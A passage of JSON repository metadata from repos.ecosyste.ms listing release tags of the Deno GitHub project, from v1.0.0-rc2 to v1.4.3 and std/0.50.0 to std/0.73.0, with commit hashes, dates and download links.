g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"